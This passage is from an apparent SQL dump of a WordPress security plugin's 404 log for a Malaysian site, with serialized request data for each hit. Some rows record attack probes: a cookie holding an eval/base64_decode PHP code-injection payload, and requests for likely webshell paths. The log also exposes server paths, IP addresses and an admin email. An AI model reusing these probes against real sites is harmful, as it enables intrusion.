cover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkp@PaSoa86rX5HNFO5ngAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570318840.1386\";s:12:\"REQUEST_TIME\";s:10:\"1570318840\";}}','notice','2019-10-05 23:40:41','2019-10-05 23:40:40',35391624,37193824,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'60.54.90.164'),(27562,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D900DC8C-DBCE-4DE1-BD62-8F730A3CC000\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZlGsYUY8eGcCNBrto1dGwAAAQA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.181\";s:11:\"REMOTE_PORT\";s:5:\"50006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlGsYUY8eGcCNBrto1dGwAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570326193.4223\";s:12:\"REQUEST_TIME\";s:10:\"1570326193\";}}','notice','2019-10-06 01:43:16','2019-10-06 01:43:13',35773136,37578424,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.181'),(27563,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/wp-includes/pomo/wp-info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"270-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"270-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"270-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/wp-includes/pomo/wp-info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/wp-includes/pomo/wp-info.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZlG6IUY8eGcCNBrto1dPAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/wp-includes/pomo/wp-info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/wp-includes/pomo/wp-info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZlG6IUY8eGcCNBrto1dPAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"69.16.254.65\";s:11:\"REMOTE_PORT\";s:5:\"38668\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/wp-includes/pomo/wp-info.php\";s:10:\"SCRIPT_URL\";s:29:\"/wp-includes/pomo/wp-info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlG6IUY8eGcCNBrto1dPAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570326248.7576\";s:12:\"REQUEST_TIME\";s:10:\"1570326248\";}}','notice','2019-10-06 01:44:10','2019-10-06 01:44:09',35055864,36859832,'https://bintara.com.my/wp-includes/pomo/wp-info.php',1,0,'69.16.254.65'),(27485,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"89393976-B855-4BB9-ACA8-4D5C77E09E9A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZcprAjr9uyDpFBVNuKI0wAAAIU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.34.132\";s:11:\"REMOTE_PORT\";s:5:\"55566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZcprAjr9uyDpFBVNuKI0wAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570187697.1681\";s:12:\"REQUEST_TIME\";s:10:\"1570187697\";}}','notice','2019-10-04 11:15:18','2019-10-04 11:15:01',35779080,37573936,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.34.132'),(27440,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.187.164.154\";s:11:\"REMOTE_PORT\";s:4:\"1527\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSwgZE1j0Gd0d0ESIz76AAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570025602.0901\";s:12:\"REQUEST_TIME\";s:10:\"1570025602\";}}','notice','2019-10-02 14:13:26','2019-10-02 14:13:22',35533832,37332720,'https://bintara.com.my/?page_id=18',1,0,'89.187.164.154'),(27441,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-includes/LICENSE.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:63:\"user=assert; id=eval/**/(base64_decode(ZGllKG1kNSgnNzc3JykpOw))\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-includes/LICENSE.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-includes/LICENSE.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZS0kGTGvQ0Bk@freowDcQAAANQ\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-includes/LICENSE.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-includes/LICENSE.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZS0kGTGvQ0Bk@freowDcQAAANQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"37.56.45.231\";s:11:\"REMOTE_PORT\";s:5:\"60080\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-includes/LICENSE.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-includes/LICENSE.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZS0kGTGvQ0Bk@freowDcQAAANQ\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570026640.4392\";s:12:\"REQUEST_TIME\";s:10:\"1570026640\";}}','notice','2019-10-02 14:30:43','2019-10-02 14:30:40',35589888,37387872,'https://bintara.com.my/wp-includes/LICENSE.php',1,0,'37.56.45.231'),(27439,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:51:\"/wp-content/plugins/easyrotator-for-wordpress/c.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/wp-content/plugins/easyrotator-for-wordpress/c.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/wp-content/plugins/easyrotator-for-wordpress/c.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZSnwTDIbReULXeMMDbsdwAAAEU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/wp-content/plugins/easyrotator-for-wordpress/c.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/wp-content/plugins/easyrotator-for-wordpress/c.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZSnwTDIbReULXeMMDbsdwAAAEU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"152.231.29.2\";s:11:\"REMOTE_PORT\";s:5:\"51618\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/wp-content/plugins/easyrotator-for-wordpress/c.php\";s:10:\"SCRIPT_URL\";s:51:\"/wp-content/plugins/easyrotator-for-wordpress/c.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSnwTDIbReULXeMMDbsdwAAAEU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570023361.2842\";s:12:\"REQUEST_TIME\";s:10:\"1570023361\";}}','notice','2019-10-02 13:36:04','2019-10-02 13:36:01',35849224,37651272,'https://bintara.com.my/wp-content/plugins/easyrotator-for-wordpress/c.php',1,0,'152.231.29.2'),(27438,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.68.174.83\";s:11:\"REMOTE_PORT\";s:5:\"54052\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSeZ5E1j0Gd0d0ESIzvxAAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570020967.9816\";s:12:\"REQUEST_TIME\";s:10:\"1570020967\";}}','notice','2019-10-02 12:56:10','2019-10-02 12:56:08',35142856,36951864,'https://bintara.com.my/?page_id=18/contact.php',1,0,'34.68.174.83'),(27437,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/blog\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 